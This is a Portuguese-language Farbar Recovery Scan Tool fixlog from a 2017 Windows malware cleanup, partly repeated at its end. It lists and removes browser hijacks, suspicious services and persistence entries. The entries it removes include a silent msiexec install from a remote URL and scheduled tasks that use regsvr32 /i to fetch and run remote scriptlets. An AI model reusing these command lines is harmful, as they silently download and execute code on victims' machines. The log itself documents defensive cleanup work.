Publicité
Publicité
Format du document : text/plain
Prévisualisation
Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 03-05-2017 01
Executado por Sil C San (03-05-2017 18:06:05) Run:2
Executando a partir de C:\Users\Sil C San\Desktop
Perfis Carregados: Sil C San (Perfis Disponíveis: Sil C San & Bel)
Modo da Inicialização: Normal
==============================================
fixlist Conteúdo:
*****************
start
CloseProcesses:
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QRTY5RYM3NUNSMURQNkU4NkIdRjF8NWM2M8MyNWU4NF== /q
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\...\MountPoints2: {7ec9f21f-7755-11e6-8282-bc5ff44714c2} - I:\O16Setup.EXE
HKU\S-1-5-18\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
IFEO\taskmgr.exe: [Debugger]
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo
BootExecute: autocheck autochk * sdnclean64.exe
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://br.yahoo.com/?fr=hp-avast&type=avastbcl
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://br.yahoo.com/?fr=hp-avast&type=avastbcl
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pt-br/?ocid=iehp
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATEN��O
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
SearchScopes: HKLM-x32 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKU\S-1-5-21-4089044868-1957115196-969965961-1000 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKU\S-1-5-21-4089044868-1957115196-969965961-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4089044868-1957115196-969965961-1000 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A"
StartMenuInternet: (HKLM) OperaStable - C:\Program Files (x86)\Opera\Launcher.exe hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-27] () <==== ATEN��O
R2 Kitty; C:\Users\Sil C San\AppData\Local\Kitty\Kitty.dll [553472 2017-04-25] (kitty) [Arquivo n�o assinado] <==== ATEN��O
R2 WinSAPSvc; C:\Users\Sil C San\AppData\Roaming\WinSAPSvc\WinSAP.dll [513536 2017-05-02] (win) [Arquivo n�o assinado] <==== ATEN��O
R1 legendasdrv; C:\Windows\System32\drivers\legendasdrv.sys [57584 2015-12-04] (GT)
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ATEN��O
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Users\Todos os Usu�rios\Spybot - Search & Destroy
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-04-26 08:53 - 2017-04-26 08:53 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Users\Todos os Usu�rios\Spybot - Search & Destroy
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-04-26 08:53 - 2017-04-26 08:53 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking
2017-04-17 13:10 - 2017-04-17 13:10 - 00000000 ____D C:\Users\Bel\AppData\Roaming\Elex-tech
2017-04-17 11:05 - 2017-04-25 19:58 - 00000000 ____D C:\Windows\system32\log
2017-04-17 11:05 - 2016-05-22 23:41 - 00055056 _____ (Elex do Brasil Participa��es Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
2017-04-17 11:05 - 2016-05-19 03:42 - 00052392 _____ (Elex do Brasil Participa��es Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys
Task: {9487D528-8C9A-4171-ACA3-FDF7F8CC3A08} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {C6802DAA-72EA-4B92-A407-FC62C947F18C} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATEN��O
Task: {DDDCD278-6B8F-4C22-984E-34087ADEBE09} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1QRTY5RYM3NUNSMURQNkU4NkIdRjF8NWM2M8MyNWU4NF== scrobj.dll
Task: {FD4D8B39-5C13-4BA2-AD17-49BAD88CD798} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1QRTY5RYM3NUNSMURQNkU4NkIdRjF8NWM2M8MyNWU4NF== scrobj.dll
ShortcutWithArgument: C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
ShortcutWithArgument: C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
ShortcutWithArgument: C:\Users\Sil C San\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:u6eBQrM0Z2K3FKLVBMG8dY3IkKT2rqFO+Sf68h8fDg== [32]
AlternateDataStreams: C:\Windows\System32:7B753593_Uni.gbp [2]
AlternateDataStreams: C:\Windows\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4 [1270]
AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [1198]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
AlternateDataStreams: C:\Users\Todos os Usu�rios\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
CreateRestorePoint:
RemoveProxy:
EmptyTemp:
Hosts:
Reboot:
end
*****************
Processos fechados com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valor removido (a) com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{7ec9f21f-7755-11e6-8282-bc5ff44714c2} => chave removido (a) com sucesso.
HKCR\CLSID\{7ec9f21f-7755-11e6-8282-bc5ff44714c2} => chave não encontrado (a).
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\SpybotPostWindows10UpgradeReInstall => valor removido (a) com sucesso.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => chave removido (a) com sucesso.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => chave removido (a) com sucesso.
HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => chave não encontrado (a).
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => chave removido (a) com sucesso.
HKCR\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => chave não encontrado (a).
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => chave removido (a) com sucesso.
HKCR\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => chave não encontrado (a).
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => chave removido (a) com sucesso.
HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => chave não encontrado (a).
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => chave removido (a) com sucesso.
HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => chave não encontrado (a).
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => chave removido (a) com sucesso.
HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => chave não encontrado (a).
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => chave removido (a) com sucesso.
HKCR\Wow6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => chave não encontrado (a).
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => chave removido (a) com sucesso.
HKCR\Wow6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => chave não encontrado (a).
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => chave removido (a) com sucesso.
HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => chave não encontrado (a).
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => chave removido (a) com sucesso.
HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => chave não encontrado (a).
HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => valor restaurado com sucesso
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => valor restaurado com sucesso
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => valor restaurado com sucesso
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => valor restaurado com sucesso
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => valor restaurado com sucesso
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => valor restaurado com sucesso
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => valor restaurado com sucesso
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => valor restaurado com sucesso
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache => valor removido (a) com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000_Classes\ChromeHTML => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor restaurado com sucesso
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor restaurado com sucesso
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a).
HKCR\Wow6432Node\CLSID\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a).
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor removido (a) com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a).
HKCR\CLSID\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a).
HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => valor restaurado com sucesso
Chrome HomePage => não encontrado (a).
Chrome StartupUrls => não encontrado (a).
HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\shell\open\command\\Default => valor restaurado com sucesso
FirefoxU => serviço não encontrado (a).
Kitty => serviço não encontrado (a).
WinSAPSvc => serviço não encontrado (a).
legendasdrv => Serviço finalizado com sucesso.
HKLM\System\CurrentControlSet\Services\legendasdrv => chave removido (a) com sucesso.
legendasdrv => serviço removido (a) com sucesso.
iSafeKrnlMon => serviço não encontrado (a).
HKLM\System\CurrentControlSet\Services\Synth3dVsc => chave removido (a) com sucesso.
Synth3dVsc => serviço removido (a) com sucesso.
HKLM\System\CurrentControlSet\Services\tsusbhub => chave removido (a) com sucesso.
tsusbhub => serviço removido (a) com sucesso.
HKLM\System\CurrentControlSet\Services\VGPU => chave removido (a) com sucesso.
VGPU => serviço removido (a) com sucesso.
"C:\Users\Todos os Usu�rios\Spybot - Search & Destroy" => não encontrado (a).
C:\ProgramData\Spybot - Search & Destroy => movido com sucesso
C:\Program Files (x86)\Spybot - Search & Destroy 2 => movido com sucesso
C:\Windows\System32\Tasks\Safer-Networking => movido com sucesso
"C:\Users\Todos os Usu�rios\Spybot - Search & Destroy" => não encontrado (a).
"C:\ProgramData\Spybot - Search & Destroy" => não encontrado (a).
"C:\Program Files (x86)\Spybot - Search & Destroy 2" => não encontrado (a).
"C:\Windows\System32\Tasks\Safer-Networking" => não encontrado (a).
"C:\Users\Bel\AppData\Roaming\Elex-tech" => não encontrado (a).
C:\Windows\system32\log => movido com sucesso
"C:\Windows\system32\Drivers\iSafeKrnlBoot.sys" => não encontrado (a).
"C:\Windows\system32\Drivers\iSafeNetFilter.sys" => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9487D528-8C9A-4171-ACA3-FDF7F8CC3A08} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9487D528-8C9A-4171-ACA3-FDF7F8CC3A08} => chave removido (a) com sucesso.
C:\Windows\System32\Tasks\Adobe Acrobat Update Task => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Acrobat Update Task => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6802DAA-72EA-4B92-A407-FC62C947F18C} => chave não encontrado (a).
C:\Windows\System32\Tasks\Milimili => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DDDCD278-6B8F-4C22-984E-34087ADEBE09} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DDDCD278-6B8F-4C22-984E-34087ADEBE09} => chave removido (a) com sucesso.
C:\Windows\System32\Tasks\PowerWord-SCT-JT => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FD4D8B39-5C13-4BA2-AD17-49BAD88CD798} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FD4D8B39-5C13-4BA2-AD17-49BAD88CD798} => chave removido (a) com sucesso.
C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => chave removido (a) com sucesso.
C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk => Atalho argumento removido (a) com sucesso..
C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk => Atalho argumento removido (a) com sucesso..
C:\Users\Sil C San\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Atalho argumento removido (a) com sucesso..
C:\Program Files (x86)\GbPlugin => ":IncompleteStartProcessProtection.cnt" ADS removido (a) com sucesso..
C:\Program Files (x86)\GbPlugin => ":u6eBQrM0Z2K3FKLVBMG8dY3IkKT2rqFO+Sf68h8fDg==" ADS removido (a) com sucesso..
C:\Windows\System32 => ":7B753593_Uni.gbp" ADS removido (a) com sucesso..
C:\Windows\system32\Drivers\gbpddfac64.sys => ":X5ZN8aGvT4" ADS removido (a) com sucesso..
C:\Windows\system32\Drivers\wsddfac.sys => ":X5ZN8aGXs4" ADS removido (a) com sucesso..
C:\ProgramData\Reprise => ":wupeogjxlctlfudivq`qsp`28hfm" ADS removido (a) com sucesso..
"C:\Users\Todos os Usu�rios\Reprise" => ":wupeogjxlctlfudivq`qsp`28hfm" ADS não encontrado (a).
Ponto de Restauração criado com sucesso.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso.
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso.
========= Fim de RemoveProxy: =========
C:\Windows\System32\Drivers\etc\hosts => movido com sucesso
Hosts restaurado com sucesso.
=========== EmptyTemp: ==========
BITS transfer queue => 12582912 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 21460453 B
Java, Flash, Steam htmlcache => 7461778 B
Windows/system/drivers => 2571811 B
Edge => 0 B
Chrome => 73808952 B
Firefox => 0 B
Opera => 1611488 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 219196 B
systemprofile32 => 3754762 B
LocalService => 66228 B
NetworkService => 66228 B
Sil C San => 18752276 B
Bel => 20334892 B
RecycleBin => 4858432 B
EmptyTemp: => 159.8 MB de dados temporários Removidos.
================================
O sistema precisou ser reiniciado.
==== Fim de Fixlog 18:07:01 ====
Executado por Sil C San (03-05-2017 18:06:05) Run:2
Executando a partir de C:\Users\Sil C San\Desktop
Perfis Carregados: Sil C San (Perfis Disponíveis: Sil C San & Bel)
Modo da Inicialização: Normal
==============================================
fixlist Conteúdo:
*****************
start
CloseProcesses:
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QRTY5RYM3NUNSMURQNkU4NkIdRjF8NWM2M8MyNWU4NF== /q
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\...\MountPoints2: {7ec9f21f-7755-11e6-8282-bc5ff44714c2} - I:\O16Setup.EXE
HKU\S-1-5-18\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
IFEO\taskmgr.exe: [Debugger]
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo
